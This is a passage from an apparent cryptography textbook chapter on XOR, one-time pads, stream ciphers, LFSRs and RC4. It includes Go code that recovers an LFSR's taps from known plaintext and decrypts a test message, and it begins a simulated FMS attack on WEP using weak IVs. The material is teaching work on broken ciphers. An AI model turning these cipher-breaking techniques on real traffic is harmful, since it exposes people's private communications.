the limitations, let’s first discuss what would it mean for an encryption algorithm to be
“perfect”.
In chapter 1 we also briefly touched upon Kerckhoff’s principle, which stated that a cryp-
tosystem should be secure even if an attacker knows everything about the system except
the key. This was phrased by Claude Shannon (commonly known as the “father of infor-
mation theory”) as “the enemy knows the system”. Shannon went on to describe precisely
what would it mean for an encryption algorithm to provide perfect security: the cipher-
text should provide no information about plaintext without the knowledge of the secret key.
“Shannon ciphers” are symmetric encryption algorithms that satisfy this criterion.

Perfect security
An encrypted message must provide no information about the original plaintext unless
you have the secret key.

4.1.1 The exclusive-or (XOR) operation and its role in cryptography


Exclusive-or or “XOR” is a logical operation that we briefly encountered while discussing
the Mersenne-Twister RNG in chapter 2. It is defined as a logical operation that takes
two input bits (or Boolean values) and outputs a single result. This is usually denoted as
⊕ in mathematical texts and by ^ in programming languages (at least for those where bit-
manipulation syntax is inspired by C). The truth table for this operation is shown in table
4.1.

x y z=x⊕y
T T F
T F T
F T T
F F F
Table 4.1 Truth-table (inputs and output) for the XOR operation

“Exclusive” refers to the fact that the result is true only if one of the inputs is exclusively
true (i.e., the other one is false). We apply the exclusivity principle in daily life all the time.
For example, dual nationality is expressly forbidden for people born in certain countries.
They can be a citizen of their birth country or immigrate and get naturalized in a new
one, but they cannot legally retain citizenship of both countries (true ⊕ true is false). For a
given world cup, a country can either win or lose the tournament but not both. Biological
organisms are either dead or alive (most of the time) and so on.
As it turns out, this almost wickedly simple operation protects the world’s information
by serving as a fundamental building block of cryptography. Let’s see how.
Imagine that x is the plaintext in figure 4.1; y is the key and the result of the XOR
operation is the ciphertext, as shown in figure 4.2. This would give us the truth table shown
in table 4.2 (figure 4.2).

Plaintext (x) Key (y) Ciphertext (z = x ⊕ y)


0 0 0
0 1 1
1 0 1
1 1 0
Table 4.2 Truth-table for the XOR operation as an encryption algorithm

If you receive ciphertext z and know the key y, you can simply XOR them back to get
x. In other words we start from the right-most column (ciphertext) in table 4.2 and XOR
it with the middle column (key) to get back the left-most column (plaintext). For example,
if you receive the ciphertext 0 and the key is 1 (the bottom row); exclusive-or would result
in plaintext 1. If you read the row the other way around in terms of encryption you’ll see
that encryption is just left to right while decryption is right to left. It might be helpful to
do this exercise for all four rows to grok the idea. In a nutshell, encrypting and decrypting
a piece of data under the same key produces back the original data when using XOR as an
encryption algorithm.
Figure 4.2 Usage of XOR as a symmetric encryption algorithm

If an attacker gets hold of the ciphertext and does not know the key, can they “guess” the
plaintext? Let’s say the ciphertext is a 1 (the two middle rows in table 4.1). Since the key is
unknown, both plaintexts (0 or 1) are equally possible. In other words, ciphertext provides
no information about the plaintext, making it perfectly secure.
XOR therefore satisfies two important criteria as an encryption algorithm:
When using the same key, decryption produces the original plaintext for a corre-
sponding ciphertext.
For a given ciphertext, if the key is unknown to the attacker, all plaintexts are equally
probable as the original message.

4.1.2 One-time pad and its practical limitations


As a matter of fact, if we could get a truly random stream of bits to be used as the key, we
would be able to generate as many bits as the plaintext and just use XOR as the encryption
algorithm. For example, if the plaintext is “HELLO WORLD” (11 bytes in most encod-
ings), we could use a TRNG to generate 88 random bits for the key and just XOR them
with the plaintext to get the encrypted ciphertext.
Known as “one-time pad” (OTP), this approach to encryption mathematically proven
to be perfectly secure. There are a few caveats though that make OTP impractical for
large-scale usage. As the name signifies, we need to generate a new key each time some
plaintext needs to be encrypted; and the key needs to be as long as the plaintext itself!
The usage of XOR is also susceptible to “known-plaintext” attack. Equation 4.1 shows the
XOR encryption algorithm that we discussed above.

Plaintext ⊕ Key = Ciphertext (4.1)

Imagine that you use this algorithm with your own secret key that you use to commu-
nicate with your close friends. An attacker eavesdrops on your communications and gets
a hold of bunch of ciphertexts. They don’t know the key, but they guess that some of the
plaintexts probably start with “Hello” or some variation on common greetings. From there
they can recover first few bytes of the key by rearranging the terms of equation 4.1. This is
actually a quite powerful technique, a variant of which was used to break the WEP protocol
(the first iteration of engineers trying to provide Wi-Fi security), we will discuss it in detail
in the upcoming sections and implement the exploit ourselves. For now, let’s familiarize
ourselves with the rearranged equation 4.2 to see how parts of the key can be recovered
by XORing the ciphertext and plaintext.

Key = Ciphertext ⊕ Plaintext (4.2)


Since XOR operation cancels itself out, if you use the same key for different messages
(therefore violating the “one-timeness”) to all of your friends, even if the attacker does not
recover the key itself they can simply XOR the ciphertexts together to get an XORed ver-
sion of the plaintexts back, as shown in equation 4.3 (the key gets canceled out by XORing
the ciphertexts). This is known as a “key-reuse attack”.

Plaintext1 ⊕ Key = Ciphertext1


Plaintext2 ⊕ Key = Ciphertext2 (4.3)
Plaintext1 ⊕ Plaintext2 = Ciphertext1 ⊕ Ciphertext2

So, we have a few major challenges in using OTP or XOR as one encryption algorithm
to rule them all:
The key must be at least as long as the plaintext.
The key must be truly random.
The key must not be reused.
Imagine a TRNG generates as many bytes as needed for a plaintext. These bytes are
shared as the key with the intended recipient of our communication. Now, we can send
one plaintext of that length and assuming the attacker does not get a hold of the key we
attain perfect security.
Now imagine that the plaintext is actually a video or some high-resolution photo or an
entire dossier. You would need to generate new keys sometimes gigabytes long, somehow
transport those securely to the recipient and then send ciphertexts separately.
This all sounds highly impractical but for specialized use-cases it actually isn’t. For ex-
ample, two parties could use some clever interpretation of some specific phone directories
as “keys” and then use one-time pad to encrypt small (one-liners) messages. Around hun-
dred years ago this actually could have provided some significant level of security assuming
the attacker wasn’t familiar with what was being used for the key. These days however even
if the source of the key was not known the fact that phone directories are poor sources of ran-
domness would allow sophisticated adversaries to crack the key even without knowing the
specific booklet that was being used to generate it.
The problem of needing a key as long as the plaintext can be solved by using a CSPRNG.
The CSPRNGs takes a “seed” as input and generate a stream of pseudorandom bytes. We
can use those bytes as the key to one-time pad as shown in figure 4.3. The “seed” of the
CSPRNG can then become a shortened version of the key that can be shared with the
recipient. Instead of generating and sharing a random key of 5 gigabytes to share a video
file, you can simply share a few hundred bytes of seed and then run the CSPRNG to
generate a “keystream”.

Figure 4.3 Stream ciphers: CSPRNG providing input key to a one-time pad

The construction shown in 4.3 is known as a “stream cipher”. This is in contrast to


“block” ciphers. The main difference between the two is that stream ciphers operate on a
stream of bits, i.e., they would operate the exact same way regardless of the plaintext being
5 bits or 103 bits long. Block ciphers on the other hand group together plaintext into
chunks called “blocks” as shown in figure 4.4. Block ciphers need to take some extra steps
if plaintext does not fit neatly into equal-length chunks. Stream ciphers are comparatively
very fast but lack the property of diffusion which we will explore in detail in chapter 5.
Because stream cipher keys must not be reused (or the attacker can simply XOR two
ciphertexts to obtain XOR of two plaintexts), a new key should be generated for each mes-
sage encrypted by a stream cipher. This can be challenging; after all, each new key needs
to be communicated to the recipient securely somehow as plaintext. The way this is ad-
dressed in practice is by using a nonce – a random number generated for each message that
is sent in clear along with the message – that is combined with a fixed key to generate a
unique key for each message. The partial but fixed key is shared among the participants
(e.g., as a Wi-Fi password) while RNGs are used to generate the nonces that will be mixed
in.

Cryptographic nonces
Many cryptographic algorithms require nonce: short for “number used once”. These
are random bits that are communicated publicly – and are hence known to attackers
– but add unpredictability to the results of such algorithms.

We shall now look at two stream ciphers, implement them, and then exploit them using
their specific weaknesses.
Figure 4.4 Stream ciphers versus block ciphers

4.2 Linear Feedback Shift Registers (LFSRs)


“Says You!” is a popular word game quiz show that has been going on for about quarter
of a century. The very first episode that I caught on radio had the contestants attempt to
determine which definition was the correct one for the word “ouroboros”. Unfortunately
I have since forgotten the two incorrect definitions (one of them was likely a misdirection
on account of phonetic similarity to “aurora borealis”), but I do recall that none of the con-
testants were able to recognize it correctly as denoting an ancient symbol of a snake eating
its own tail – it just sounded ridiculous. Turns out not only was that the right definition it
has applications in cryptography!
“Shift registers” are a type of electronic logic circuit that stores and outputs data by
moving one bit in a given direction of the register at every step. Figure 4.5 shows a few
steps of a shift register outputting bits. On each step some new bit is inserted from the left,
all the bits are moved to the right and the right-most bit is output as the result. They can
be considered “First-In First-Out” (FIFO) queues that we make at the bank or grocery
counters.

Figure 4.5 A shift registers outputting three bits

A linear feedback shift register works similarly. At each step it moves the internal contents
one bit in some direction, outputs the “ejected” bit as the result of that iteration and then
XORs some of the previous bits to generate a new “shift” bit that it inserts at the other end
to keep things moving. A few iterations of an example LFSR are shown in figure 4.6 – if
you squint hard enough you might be able to see an ouroboros!

Figure 4.6 A “linear feedback” shift register showing execution of first few steps

This configuration is known as “Fibonacci” LFSRs. There is another class of LFSRs


called “Galois” LFSRs which XOR the ejected bit at each tap location, as opposed to the
Fibonacci LFSRs which XOR the ejected bit once. We shall be implementing and exploit-
ing the Fibonacci LFSRs in the next two sections. LFSRs have a “length” which simply
denotes how many bits does its internal state have. All LFSRs also have a “period” after
which their output will start repeating itself. If maximum period of an LFSR of length L
is equal to 2L − 1.

4.2.1 Implementing LFSRs


LFSRs need to keep track of two things: (1) their current state and (2) the position of
feedback taps. This is shown in listing 4.1 where the LFSR struct has three fields. While the
state and taps could be bool slices (they only store a single bit in each location), defining
them as byte makes XORing easier (you cannot XOR bools in Go). While the struct does
not need to keep track of length (since len(state) would have the same information)
we keep it as a separate field to improve readability of example code.

Listing 4.1 ch04/lfsr/impl_lfsr/impl_lfsr.go

12 package impl_lfsr
13
14 type LFSR struct {
15 length int
16 taps []byte
17 state []byte
18 }
19
20 func NewLFSR(length int, taps []byte, state []byte) *LFSR {
21 lfsr := &LFSR{
22 length,
23 make([]byte, len(taps)),
24 make([]byte, len(state)),
25 }
26
27 copy(lfsr.state, state)
28 copy(lfsr.taps, taps)
29
30 for i := 0; i < length; i++ {
31 lfsr.GenerateBit()
32 }
33
34 return lfsr
35 }

Figure 4.7 An LFSR providing the keystream for encryption using XOR

The output of an LFSR can be used as the “keystream” for a XOR function to simulate
a one-time pad as shown in figure 4.7. This would make the initial state of the LFSR the
“key” for our encryption. The distinction between the key and the keystream is important
to understand. The key is what you use to start the LFSR in a manner of speaking. The
keystream is what actually gets XORed with the plaintext. Let’s say the initial key is the
Wi-Fi password. If an attacker could somehow compromise a keystream they can decrypt
a packet that was encrypted using this particular keystream. They still cannot craft new
packets however that would be decrypted correctly by their router. If they knew the seed
however – the equivalent of Wi-Fi password – they would be able to craft correctly en-
crypted packets of their own. Fortunately, while Wi-Fi uses stream ciphers it does not use
LFSRs. Unfortunately, the first few iterations of Wi-Fi security did use a different stream
cipher (RC4) that turned out to be insecure – which we will implement & exploit in the
next section.
Before we are going to use our LFSR for encryption though let’s try to put some dis-
tance between the key and the keystream. Lines ?? - ?? in listing 4.1 show the LFSR “wast-
ing” the first N bits where N is equal to the length of the LFSR. This simply flushes out
the initial key bits, making sure encryption only happens by XORing plaintext with a linear
combination of the original key but not the original key itself.
The workhorse of our LFSR implementations is the GenerateBit() function shown in
listing 4.2. This corresponds closely to the operation shown in figure 4.6. We store the old
“right-most” bit in outputBit. Lines 40 - 42 calculate the new “shift-in” bit by traversing
all bits of the LFSR state and XORing those where a tap is active at the corresponding
index. Lines 44 - 46 move the contents of all registers one position to the right, and we
finally set the left most bit in the LFSR state to the newly calculated shift bit.

Listing 4.2 ch04/lfsr/impl_lfsr/impl_lfsr.go

36 func (lfsr *LFSR) GenerateBit() byte {


37 outputBit := lfsr.state[lfsr.length-1]
38
39 newShiftBit := byte(0x00)
40 for i := 0; i < lfsr.length; i++ {
41 newShiftBit = newShiftBit ^ (lfsr.taps[i] & lfsr.state[i]) Calculate new shift bit
42 }
43
44 for i := lfsr.length - 1; i > 0; i-- {
45 lfsr.state[i] = lfsr.state[i-1] Right shift the internal state
46 }
47
48 lfsr.state[0] = newShiftBit
49
50 return outputBit
51 }

Encryption is straightforward XOR with one caveat: we need to call GenerateBit() 8


times to generate one byte of keystream, as shown in listing 4.3.

Listing 4.3 ch04/lfsr/impl_lfsr/impl_lfsr.go

53 func (lfsr *LFSR) Encrypt(plaintext []byte) []byte {


54 result := make([]byte, len(plaintext))
55
56 for i := 0; i < len(plaintext); i++ {
57 keyStream := byte(0x00)
58 for j := 7; j >= 0; j-- {
59 keyStream = keyStream ^ (lfsr.GenerateBit() << j)
60 }
61 result[i] = keyStream ^ plaintext[i]
62 }
63
64 return result
65 }

The test cases for this LFSR implementation can be found in the accompanying code
repo at: github.com/krkhan/crypto-impl-exploit

4.2.2 Exploiting LFSRs


Can we find out the taps of an LFSR just by observing its output stream? Let’s first simplify
the problem by assuming that the attacker knows the length of the LFSR (i.e., how many
bits does its internal state consist of).
REVERSING LFSR TAPS WHEN ITS LENGTH IS KNOWN
The operation of an LFSR with L taps can be described by equation 4.4, which says
“sn+1 (each new sample in the sequence) is obtained by multiplying previous L values of
s with corresponding taps in a and adding them together”. Multiplication and addition in
this context denote the logical AND & XOR operations respectively. We saw the code for
GenerateBit() in listing 4.2 implement this equation using boolean operations.

sn+1 = a0 sn−L + ... + aL−1 sn−1 + aL sn (4.4)


Let’s say we are working with an LFSR of length 3. It has initial state (s0 , s1 , s2 ). Equa-
tion 4.5 shows the new states for first few iterations.

s3 = a0 s0 + a1 s1 + a2 s2
s4 = a0 s1 + a1 s2 + a2 s3 (4.5)
s5 = a0 s2 + a1 s3 + a2 s4

Equation 4.4 can then be represented in the form of a matrix as represented in equation
4.6.

     
s3  s0 s1 s2   a0 
     
     
s4  = s1 s2 s3   a1 
      (4.6)
     
s5  s2 s3 s4   a2 
     
X = SA

S is the “state matrix” and denotes internal contents of the LFSR. A is the “coefficient
matrix” and represents the LFSR taps. X represents L new bits that are obtained by the
linear combination of S and A.
We can find the coefficient matrix A by inverting S, collecting enough bits for filling X
and then solving for A as shown in equation 4.7.

A = S −1 X (4.7)
We will use the matrix Go module from the OpenWhiteBox (github.com/OpenWhiteBox
/primitives/matrix) project for matrix inversion. Since we are dealing with “boolean” ma-
trices (they will only contain zeros or ones), the module also takes care of the fact that their
addition and multiplication are in fact bitwise XOR and bitwise AND respectively.

Listing 4.4 ch04/lfsr/exploit_lfsr/exploit_lfsr.go

1 package exploit_lfsr
2
3 import (
4 ”errors”
5
6 ”github.com/OpenWhiteBox/primitives/matrix”
7 ”github.com/krkhan/crypto-impl-exploit/ch04/lfsr/impl_lfsr”
8 )
9
10 const MaxLfsrLength = 256
11
12 func RecoverLFSRWithKnownLengthFromObservedBits(observedBits []byte,
lfsrLength int) (*impl_lfsr.LFSR, error) {
13 if len(observedBits) < lfsrLength*2 { Do we have enough bits to fill sMatrix?
14 return nil, errors.New(”insufficient observed bits”)
15 }
16
17 sMatrix := matrix.GenerateEmpty(lfsrLength, lfsrLength)
18 for i := 0; i < lfsrLength; i++ { This is logically
19 for j := 0; j < lfsrLength; j++ { equivalent to:
20 sMatrix[i].SetBit(j, observedBits[i+j] != 0x00) sMatrix[i][j]
21 } = observedBits[i+j]
22 }
23
24 sInvertMatrix, ok := sMatrix.Invert()
25 if !ok {
26 return nil, errors.New(”invert matrix does not exist”)
27 }
28
29 xMatrix := matrix.GenerateEmpty(lfsrLength, 1)
30 for i := 0; i < lfsrLength; i++ {
31 xMatrix[i].SetBit(0, observedBits[lfsrLength+i] != 0x00)
32 }
33 tapsMatrix := sInvertMatrix.Compose(xMatrix) A = S −1 X
34
35 recoveredTaps := make([]byte, lfsrLength) This converts
36 for i := 0; i < lfsrLength; i++ { tapsMatrix to a
37 recoveredTaps[lfsrLength-i-1] = tapsMatrix[i].GetBit(0) regular byte slice
38 } of size
39 lfsrLength
40 recoveredState := make([]byte, lfsrLength)
41 for i := 0; i < lfsrLength; i++ {
42 recoveredState[i] = observedBits[len(observedBits)-1-i]
43 }
44
45 return impl_lfsr.NewLFSR(lfsrLength, recoveredTaps, recoveredState), nil
46 }

The function shown on line 12 of listing 4.4 takes a slice of observed bits and the length
of the LFSR it is trying to recover. At line 13 we check if we have enough bits to fill up
the square matrix S in equation 4.6. Lines 17 - 22 fill sMatrix with the observed bits by
calling the SetBit() method on each row of the newly created matrix. Line 24 tries to
calculate S −1 . This step will fail if the bitstream is not the output of an LFSR (i.e., the
bitstream is not a linear combination), or if we have provided the wrong length for the
LFSR. We then generate the single column xMatrix containing lfsrLength number of
rows. We finally implement equation 4.7 on line 33. Lines 35 - 38 convert tapsMatrix
back to a regular byte slice on. Now that we have the tap positions reversed we can create
our own cloned LFSR, but we need to put it in the same state as the one we are trying
to exploit. Fortunately this part is easy, the last lfsrLength bits of observed bits actually
tell us the LFSR state in lines 40 - 43. The last line in the function returns a new LFSR
created using the taps and state we just recovered.
REVERSING LFSR TAPS WHEN ITS LENGTH IS NOT KNOWN
In the previous section we recovered taps for an LFSR by observing its output and
constructing matrices related to the LFSR’s length L. If we are observing output of a totally
unknown LFSR and have no clue about the length can we still crack it?
There is a really sophisticated solution to this problem known as the Berlekamp-Massey
algorithm. It finds the shortest LFSR (taps and initial state) that would produce any given
binary sequence. Although the algorithm is simple to implement and beautiful to see in
action, it is hard to understand why it works without a deep mathematical context and
explanation – it is after all named after two Shannon award winners (the Nobel Prize of
information theory); James Massey & Elwyn Berlekamp. As I struggled with grokking why
it works I thought of a rather ugly workaround: we can just try all lengths one by one. All
lengths fail on line 24 of listing 4.4 (the matrix inversion) until we hit the correct length.
LFSRs lengths are usually not that huge – even a 32 bit long LFSR can have a period
greater than 4 billion. Running our matrix reversal exploit 32 times would take less than a
second on our modern laptops. Therefore, since the bruteforce solution is quite practical
and much simpler to understand we’ll use that for our exploit instead of the more efficient
Berlekamp-Massey algorithm. Listing 4.5 shows us trying different LFSR lengths until we
recover one without error.

Listing 4.5 ch04/lfsr/exploit_lfsr/exploit_lfsr.go

58 func RecoverLFSRFromObservedBits(observedBits []byte) (*impl_lfsr.LFSR, error


) {
59 for i := 1; i < MaxLfsrLength; i++ {
60 if clonedLfsr, err := RecoverLFSRWithKnownLengthFromObservedBits(
observedBits, i); err == nil {
61 return clonedLfsr, nil
62 }
63 }
64 return nil, errors.New(”could not recover LFSR”)
65 }

To test our exploit we simulate a scenario where an attacker knows a prefix but not the
entire plaintext. That is, the attacker knows that the plaintext message starts with ATTACK
AT but does not know what comes after it. The attacker intercepts a ciphertext and knows
that it was encrypted using an LFSR. Listing 4.6 shows the function that will be used to
simulate this scenario and generate an attack message.

Listing 4.6 ch04/lfsr/exploit_lfsr/exploit_lfsr_test.go

87 const AttackMessageKnownPrefix = ”ATTACK AT ”


88
89 func GenerateEncryptedAttackMessage() []byte {
90 rand.Seed(time.Now().Unix())
91 minTime := time.Date(2022, 1, 0, 0, 0, 0, 0, time.UTC).Unix()
92 maxTime := time.Date(2025, 1, 0, 0, 0, 0, 0, time.UTC).Unix()
93 deltaTime := maxTime - minTime
94 seconds := rand.Int63n(deltaTime) + minTime
95 plaintext := AttackMessageKnownPrefix + time.Unix(seconds, 0).String()
96
97 seed := uint16(rand.Intn(256))
98 lfsr := impl_lfsr.NewLFSR16Bit(seed)
99 return lfsr.Encrypt([]byte(plaintext))
100 }

Listing 4.7 generates an encrypted attack message and then recovers the LFSR used
to encrypt it by using the known plaintext. Line 107 corresponds to equation 4.2 for re-
versing the keystream by XORing the known plaintext bytes with corresponding cipher-
text bytes. Lines 108 - 110 “expand” the keystream byte into individual bits to be pro-
cessed by the functions we have defined so far. Line 112 clones the LFSR using observed
keystream bits (so that we can decrypt the remaining ciphertext where we do not know
the corresponding plaintext). Line 117 “decrypts” the ciphertext by encrypting it with the
recovered LFSR. We saw previously that for XOR, encryption and decryption are the
same operation so if we have reversed the LFSR correctly we should get back the original
plaintext. Running the LFSR tests by executing make lfsr generates the output shown in
listing 4.8.

Listing 4.7 ch04/lfsr/exploit_lfsr/exploit_lfsr_test.go

102 func TestKnownPlaintextAttack(t *testing.T) {


103 ciphertext := GenerateEncryptedAttackMessage()
104 t.Logf(”Ciphertext: %q”, ciphertext)
105 keystreamBits := make([]byte, 8*len(AttackMessageKnownPrefix))
106 for i := 0; i < len(AttackMessageKnownPrefix); i++ {
107 keystreamByte := ciphertext[i] ^ AttackMessageKnownPrefix[i]
108 for j := 0; j < 8; j++ { Expand keystream
109 keystreamBits[8*i+j] = (keystreamByte >> (7 - j)) & 1 bytes to bits
110 }
111 }
112 recoveredLfsr, err := RecoverLFSRFromObservedBits(keystreamBits)
113 if err != nil {
114 t.Error(err)
115 }
116 remainingCiphertext := ciphertext[len(AttackMessageKnownPrefix):]
117 decrypted := recoveredLfsr.Encrypt(remainingCiphertext)
118 t.Logf(”Decrypted message: %s%s\n”, AttackMessageKnownPrefix, decrypted)
119 }

Listing 4.8 make lfsr

...
=== RUN TestKnownPlaintextAttack
exploit_lfsr_test.go:104: Ciphertext: ”e\xc67gWL.\x7f\xdd08\x8d0J\xaaFQL
:\x90(\xfd\xf6\xcb\x10\x1b/E\xfd\x1f:\xa4\x06\x1a\xae\x83x\x9c2”
exploit_lfsr_test.go:118: Decrypted message: ATTACK AT 2024-01-10
11:25:35 -0800 PST
--- PASS: TestKnownPlaintextAttack (0.00s)
...

4.3 RC4 Encryption & Wi-Fi Security


We saw how stream ciphers approximate the one-time pad by XORing plaintext with a
keystream to generate the ciphertext. We will now take a look at a famous stream cipher
known as RC4 (Rivest Cipher 4 – named after its creator Ron Rivest). RC4 is quite simple
to describe and easy to implement in both software and hardware, but its use has led to
several vulnerabilities – most notably leading to the fall of industry’s first attempt at Wi-
Fi security: WEP (Wired Equivalent Privacy). We will look at the WEP vulnerability in
detail and simulate an exploit in Go.

4.3.1 Implementing RC4

Figure 4.8 RC4 internal state: a 256 byte S-box and two pointers i & j

Like other stream ciphers, RC4 generates a keystream as output. Unlike LFSRs though
RC4 generates the keystream one byte at a time (as opposed to individual bits generated by
each LFSR cycle). These bytes are subsequently used as keystream for XORing with the
plaintext. RC4 internal state consists of two parts shown in figure 4.8.
An “S-box” (substitution box) containing 256 bytes. The S-box is started by filling
each location with its index (i.e., index 6 would contain the byte 0x06 and so on) and
then shuffling them around by following the algorithm steps. This ends up making the
S-box a permutation: each number from 0-255 will appear in the S-box exactly once
at all times, but the locations keep changing. Think of filling a box with bunch of rocks
and shaking it violently. The rocks would definitely be misplaced, their “ordering”
would change, but the box would still have the same number of rocks and the same
rocks as before.
Two pointers i and j that keep jumping around the S-box indices based on the algo-
rithm steps.
Our definition for the RC4 internal state is shown in listing 4.9. We also define a swap
helper function on line 13 that we will shortly be using in KSA and PRGA methods.
Listing 4.9 ch04/rc4/impl_rc4/impl_rc4.go

1 package impl_rc4
2
3 import (
4 ”math/rand”
5 ”time”
6 )
7
8 type RC4 struct {
9 key []byte
10 state [256]byte
11 }
12
13 func swap(x, y *byte) {
14 tmp := *x
15 *x = *y
16 *y = tmp
17 }
18
19 func NewRC4(key []byte) *RC4 {
20 rc4 := &RC4{
21 key: make([]byte, len(key)),
22 }
23 copy(rc4.key, key)
24 return rc4
25 }

RC4 consists of two phases: (1) the key-scheduling algorithm (KSA) and (2) the pseudo-
random generation algorithm (PRGA). When RC4 is initialized with a new key, KSA runs
once and then PRGA generates the bytes to be used as the keystream.
The pseudocode for KSA is shown in listing 4.10 [1]. The S array denotes the S-box
and K is the initial key. The first loop initializes the S-box with all values from 0 to 255
(inclusive). The second loop shuffles those bytes around by using the i and j pointers.
The i pointer scans the S-box all the way from starting index 0 to last index 255 in an
incremental fashion. The j pointer however keeps jumping all over the place. Each new
value of j is obtained by adding previous value of j, S[i] and K[i] (if i is greater than the
length of the key, the lookup simply becomes K[i%len(K)]). At each step S[i] and S[j]
are swapped in the S-box.

Listing 4.10 Pseudocode for RC4 key-scheduling algorithm

for i from 0 to 255


S[i] := i
endfor
j := 0
for i from 0 to 255
j := (j + S[i] + key[i mod keylength]) mod 256
swap values of S[i] and S[j]
endfor

Listing 4.11 implements the pseudocode from listing 4.10 in Go. The first iteration of
KSA with a key of "HELLO" is shown in figure
Listing 4.11 ch04/rc4/impl_rc4/impl_rc4.go

27 func (rc4 *RC4) ksa() {


28 for i := 0; i < 256; i++ {
29 rc4.state[i] = byte(i)
30 }
31 j := 0
32 for i := 0; i < 256; i++ {
33 j = (j + int(rc4.state[i]) + int(rc4.key[i%len(rc4.key)])) % 256
34 swap(&rc4.state[i], &rc4.state[j])
35 }
36 }

Figure 4.9 First iteration of KSA for RC4 with a key of “HELLO”, this step happens 255 more times.

The pseudocode for PRGA is shown in listing 4.12 [1]. Every time we need a new
byte for the keystream we increment i by one (wrapping around 256 if needed), and then
add S[i] to j. We then swap S[i] and S[j] and use S[i]+S[j] as an index once more
into the S-box to fetch the final output, the keystream byte K. Listing 4.14 shows the
same pseudocode translated to Go. Figure 4.10 shows PRGA generating a single byte of
keystream by showing line 46 in action.

Listing 4.12 Pseudocode for RC4 pseudo-random generation algorithm

i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
KS := S[(S[i] + S[j]) mod 256]
output KS
endwhile

Listing 4.13 ch04/rc4/impl_rc4/impl_rc4.go

38 func (rc4 *RC4) prga(length int) []byte {


39 i := 0
40 j := 0
41 keyStream := make([]byte, length)
42 for k := 0; k < length; k++ {
43 i = (i + 1) % 256
44 j = (j + int(rc4.state[i])) % 256
45 swap(&rc4.state[i], &rc4.state[j])
46 t := (int(rc4.state[i]) + int(rc4.state[j])) % 256
47 keyStream[k] = rc4.state[t]
48 }
49 return keyStream
50 }

Figure 4.10 One iteration of PRGA producing a keystream byte (after i & j are already swapped)

4.3.2 Exploiting RC4 in WEP using the Fluhrer, Mantin and Shamir (FMS) attack
WEP (Wired Equivalent Privacy) is an algorithm for Wi-Fi security that was ratified as
a standard in the late 90s. If you’ve had the experience of setting a Wi-Fi password on
routers supporting WEP in the early 00s you might remember that they had to be of a
fixed length (among a few choices – 5, 13, 16 or 29 characters long). I remember being fond
of helloworld123 as the Wi-Fi password for a while because it was exactly 13 characters
long while being very easy to communicate & remember.
Figure 4.11 shows the commonly used setup for WEP. An administrator performed the
initial setup on the Wi-Fi device by entering a pre-shared key and then shared that with
the user. The pre-shared key was colloquially known as the “Wi-Fi password” (and every
so often the admin and the user happened to be the same unfortunate soul). Each packet
was encrypted using RC4 with a new key. Each RC4 key would be obtained by concatenat-
ing three random bytes – known as “initialization vector” or IV – with the pre-shared key.
The IV would be sent publicly along with the encrypted packet. The recipient would con-
catenate the packet’s IV again with the PSK to decrypt the packet correctly. If an attacker
snooped the wireless traffic they would know the IV but not the PSK hence they would (in
theory) not know the individual RC4 keys for each packet and the communication would
stay protected. Essentially, the IV is the cryptographic nonce we discussed briefly while
introducing stream ciphers.

Figure 4.11 WEP setup showing pre-shared keys and initialization vectors as input to RC4

As soon as WEP was standardized in the late 90s concerns were raised about the nonce
being too small. The IV consisted of only three bytes or 24 bits – providing 224 possi-
ble values. Even if the Wi-Fi drivers (that provided the initialization vector) were using
good quality RNGs it would on average take 212 (roughly four thousand) packets before
two messages ended up using the same IV; allowing an attacker to recover their XORed
contents.
In the early 2000s a new attack on RC4 – known as the FMS attack (based on the sur-
names of its discoverers) – came to light that completely shattered any illusions of security
provided by WEP. Even with the discovery of this new attack, all RC4 implementations
were not broken. For example, at the time TLS (Transport Layer Security, used to pro-
vide website security) remained unscathed because it was using a unique 128-bit key for
each message. Compared to WEP – where an attacker needed to capture 4 thousand pack-
ets before seeing a collision – an attack on TLS needed drastically more (264 or some
18 quintillion) messages before a collision would take place on the same web connection.
TLS’ usage of RC4 was later broken by other weaknesses in the cipher that would be too
discursive to discuss in this chapter. We will however implement the FMS attack in Go
and simulate WEP traffic to test our exploit.
GENERATING WEP PACKETS WITH WEAK IVS
At its core, the FMS attack hinges on the choice of initialization vectors used by Wi-Fi
devices. All WEP IVs are not equally vulnerable to this attack, instead, it only operates
when someone ends up choosing an IV of the form shown in equation 4.8.

IV = (L, 255, X) (4.8)


Where L is the index of the byte we are trying to recover in the RC4 key and X can
be any random one byte value (i.e., between 0-255). These weak IVs result in leaking
information about the fixed PSK (pre-shared key). The attacker can see the IVs being sent
in clear (as shown in 4.11), and every time a weak IV is used it increases their chances of
recovering bytes of the original RC4 key.
To simulate this attack we are going to add a WEP packet generator in our RC4 im-
plementation as shown in listing ??. The plaintext for the first 8 bytes are known for all
WEP packets as they are fixed by the link layer (networking) protocol [2]. This allows
the attacker to recover the first 8 bytes of the keystream but if WEP’s RC4 implemen-
tation was not broken it would not have given the attacker any information about the
original pre-shared key that was (along with the IV) used to initialize RC4. The known
bytes are defined on line 63. Consumers of this struct generate WEP packets by calling
GeneratePacketUsingWeakIV(targetIndex) which returns the IV used for encrypting
the packet (as it is public) as well the encrypted packet itself. Line 78 shows generation of
a weak IV.

Listing 4.14 ch04/rc4/impl_rc4/impl_rc4.go

63 var SNAPHeader = [8]byte{0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06}
64
65 type WEPPacketGenerator struct {
66 psk []byte
67 }
68
69 func NewWEPPacketGenerator(psk []byte) *WEPPacketGenerator {
70 generator := &WEPPacketGenerator{
71 psk: make([]byte, len(psk)),
72 }
73 copy(generator.psk, psk)
74 return generator
75 }
76
77 func (wpg *WEPPacketGenerator) GeneratePacketUsingWeakIV(targetIndex int)
([3]byte, []byte) {
78 iv := [3]byte{byte(targetIndex), 255, byte(rand.Intn(256))} Weak IV (equation 4.8)
79 key := make([]byte, len(iv)+len(wpg.psk))
80 copy(key[0:len(iv)], iv[:])
81 copy(key[len(iv):], wpg.psk)
82 rc4 := NewRC4(key)
83 return iv, rc4.Encrypt(SNAPHeader[:])
84 }

To understand the FMS exploit we will look at the RC4 key and S-box in detail at each
step of the key-scheduling algorithm (for the first few steps). As the attacker we know the
first 3 bytes of the RC4 key (the IV) so the first time we call GeneratePacketUsingWeakIV
(targetIndex) we set targetIndex to 3. For a PSK of length N , after the concatenation of
the IV and PSK the RC4 key would look like figure 4.12. The S-box at the very beginning
of KSA looks like figure 4.13, corresponding to the values for i and j in equation 4.9.
Figure 4.12 RC4 key for GeneratePacketUsingWeakIV(targetIndex=3)

